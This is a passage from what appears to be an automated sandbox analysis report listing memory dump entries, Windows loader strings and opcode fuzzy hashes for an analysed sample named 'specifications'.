                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0108AA13
                                                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0108AA25
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0108063D
                                                                                                                                                                                  • kLsE, xrefs: 01080540
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .mui
                                                                                                                                                                                  • API String ID: 0-1199573805
                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0110895E
                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                                                  • Opcode ID: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
                                                                                                                                                                                  • Instruction ID: fd49fbd0254765509f98c5fea5b1be4984898ea5a9c414eae0099fff8c0a26ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2301F731F18206DBEA2E7A59DC84A5A7F75EFC52A4B05002CF68116292DFB06C84C792
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
                                                                                                                                                                                  • Instruction ID: 0e1fb0293179bfd50c89f6da554ea48ecc6edd5193cf1ed8552027ec89869f46
                                                                                                                                                                                  • Opcode Fuzzy Hash: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
                                                                                                                                                                                  • Instruction Fuzzy Hash: E442E3326083618FE72DCF68C890A6FBBE5BF98300F58492DFA8297250D771D955CB52
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
                                                                                                                                                                                  • Instruction ID: 334c04a325211b78a9fd23af0cb9979a37f0557fee8c11f4492a05d76a7fb693
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0423C75E102198FEB29CF69C881BEDFBB5BF48300F19C1A9E949AB245D7349981CF50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 870fa0d02555549581fea04e5eaeae55d7e91f1b1644d75dd0493036c0f0f37f
                                                                                                                                                                                  • Instruction ID: e4c16d15464cb168232a33729097357002e955664ec648f9650fd821f20a3d7c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 870fa0d02555549581fea04e5eaeae55d7e91f1b1644d75dd0493036c0f0f37f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E32FF70A007158FEB29CF6AD8587BEBBF2BFA4304F14415DD4D69B285DB36A842CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                                                                                                                                                                  • Instruction ID: 5d43f6d2f9e1749ecf888a252d6bc951c05c7a71db93dc559a835a6a34b5bb91
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4122E5702046B18FEB2DCF2DE054372BBF1AF45300F198459DA968FA86E335E462DB65
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
                                                                                                                                                                                  • Instruction ID: 8b2ee4aa9461955ea243b4882213d10cc4762698aadd8cfcac87a393e8e979fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A32AC70A05205CFDB65DFA9C480BAEBBF1FF48310F1585A9E996AB391DB31E841CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4269e28c2c823a88dc85c256fa7b41f5e88051761cec79b588e71c8ba9d99359
                                                                                                                                                                                  • Instruction ID: 7a4c90539ed3fb39bb3a9e9d86df5491e3066a9eee4d35e246e30ae9edef2721
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4269e28c2c823a88dc85c256fa7b41f5e88051761cec79b588e71c8ba9d99359
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71914131A00616DFEF24DB69C4A4BBEBBE1EF94714F0440A9E9859B390EB34DC41DB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                  • Instruction ID: 4426da0f87bf68a626bc7c43cfc92417e7287a903c48fe85bdf45c4d12999ab5
                                                                                                                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5581B271A002099FDF1DCF98D890AAEBBF6FF88710F1A8569D9569B344D734E901CB44
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f00e9c92f7125e78666506c01125e5c64cca53ee908dfb3f371e6cedef997f2e
                                                                                                                                                                                  • Instruction ID: 19a0f6be169ee9aa0461f75889c1b2a1346ae7d2cba9a05fe6106dc9aeb7cbde
                                                                                                                                                                                  • Opcode Fuzzy Hash: f00e9c92f7125e78666506c01125e5c64cca53ee908dfb3f371e6cedef997f2e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0813E71A00609AFDB65CFA9C880BEEBBF9FF48754F14842DE695A7250D730AC45CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4bef9b94f508d26950ffddb162294c7fd281ccde57135e31570325d6c0fe6574
                                                                                                                                                                                  • Instruction ID: dfbc7fff967a3b5343e7ff4fd2ac9e1c1ee752c6feac3e2c8db7a3c15ecec0e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bef9b94f508d26950ffddb162294c7fd281ccde57135e31570325d6c0fe6574
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6971AB75D04669DFDB258F59C9A07BEBBF0FF58710F14816AE892AB350E3319840DBA0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f2f136204c9f0577140ed93d4eec33d30b104d601f3de27d5b2f99f92a40d25a
                                                                                                                                                                                  • Instruction ID: 35c0c75473532f55fd760e0f13064b060937c6a5996f3f15ae36e91d88add59d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2f136204c9f0577140ed93d4eec33d30b104d601f3de27d5b2f99f92a40d25a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6671B270900605EFEB28CF99CA44A9EBBF8EFD4310F0081AAE655AB75CD7318985CF54
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cd221c47ab870c97fb6e24ef11f5f66435e3a32009b1e10e4199ea8742a3105b
                                                                                                                                                                                  • Instruction ID: 1c0d892c23d34c4b792c0ebaca053e1ea4ffe008cfba27848e6de4dab774dd50
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd221c47ab870c97fb6e24ef11f5f66435e3a32009b1e10e4199ea8742a3105b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6071EE31604242AFD752DF28C494B6AF7E5FF88310F0485AAE8D88B752DB34DC46CB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                  • Instruction ID: 3ec77d63df2295a48adb234dcd231777e44d5e44c64166cc8fa9bb6b40c4ae10
                                                                                                                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D718C71E0060AAFCB15DFA9C984BDEBBB8FF48344F104469E545EB290DB74EA01CB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5a857373f71b554ce5f8ba2e21cc19bb406b34e49796b31b0f48d48e2fa3334f
                                                                                                                                                                                  • Instruction ID: da1c88926523d76e8c659690fa64fdbbec80956757e8f0cc2eeb587d1f365b28
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a857373f71b554ce5f8ba2e21cc19bb406b34e49796b31b0f48d48e2fa3334f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3171F632140B01EFE73ADF18C854F9AFBA6EF44710F154438E259876A4DBB6E944CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e890bd1fb060cd7f97376587c6980d60860ca18e4441335eafa95df4233f07e
                                                                                                                                                                                  • Instruction ID: 9af6480b08f5eed2bfe3a02df72cee5401d6bf1fbd7c2222733ae841d22549e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e890bd1fb060cd7f97376587c6980d60860ca18e4441335eafa95df4233f07e
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB81BD72A08306CFDB28DF9DC488BADB7F5BB88310F55816ED990AB691C7749D40CB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 31c577ae634bf93f89e2f4983a6d324a53a7c3169a4a7c5a3e011297fa096609
                                                                                                                                                                                  • Instruction ID: 6023e609ed0acea59fd7ef79506f06f9069361902dc79ee97634702bed0c5d01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31c577ae634bf93f89e2f4983a6d324a53a7c3169a4a7c5a3e011297fa096609
                                                                                                                                                                                  • Instruction Fuzzy Hash: B8712B71E00209EFDF59DF95C881FEEBBB8FB04754F104129EA60A6290D774AA05CF90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5afa68c34496db138dfdb1a3419a71cb182efad9adcd9b010f0d41af1a4771c4
                                                                                                                                                                                  • Instruction ID: aadcea520a113e8d5d2a8037ab3cc5f580d9759749a11fc902ab0f4eff146825
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5afa68c34496db138dfdb1a3419a71cb182efad9adcd9b010f0d41af1a4771c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9651B072504712AFD716DF68D884E9BB7E8EFC4750F054929BA80DB254E770ED04CBA2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c7ed857e89523245d87df624ef334de34e012c46b452f81b8538d810cedba5f6
                                                                                                                                                                                  • Instruction ID: 5d6d2137c6c57275e219c7b658283297c8ea440f092485428421b6798ab62336
                                                                                                                                                                                  • Opcode Fuzzy Hash: c7ed857e89523245d87df624ef334de34e012c46b452f81b8538d810cedba5f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA51E070900715DFD729DF6AC880BABFBF8BF94714F10461EE292976A0C7B0A951CB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                                                                                                                                                                  • Instruction ID: 8d473e1e78f714d0489163a84db8e4256b9250131e1ca2ceced1ef7c8c8fa98c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e7aa68f2313c6845b79d29bb7e80048ab92f4a028c026fdf616fd5856ec685b
                                                                                                                                                                                  • Instruction Fuzzy Hash: E0514871200A499FCB62EF69C9D0EEAB3F9FF14784F400469E69697660DB34E940CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 528ee2104b42dac7a2c253d35493a1bdf00af316fe1f1ed809c6362a42f3bb74
                                                                                                                                                                                  • Instruction ID: 3c24f7f71424a1ba147a27ddb3ecab15fd2aa3e20f6da3b7cd6e0b4fb037f9a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 528ee2104b42dac7a2c253d35493a1bdf00af316fe1f1ed809c6362a42f3bb74
                                                                                                                                                                                  • Instruction Fuzzy Hash: C65187716083268FD758DF29C880AABBBE5FFC8208F44492DF589C7650EB30D915CB96
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                  • Instruction ID: dd9ae5344e55755c53ef42066300323c417581c3183800fc1051e6dc2d31e81a
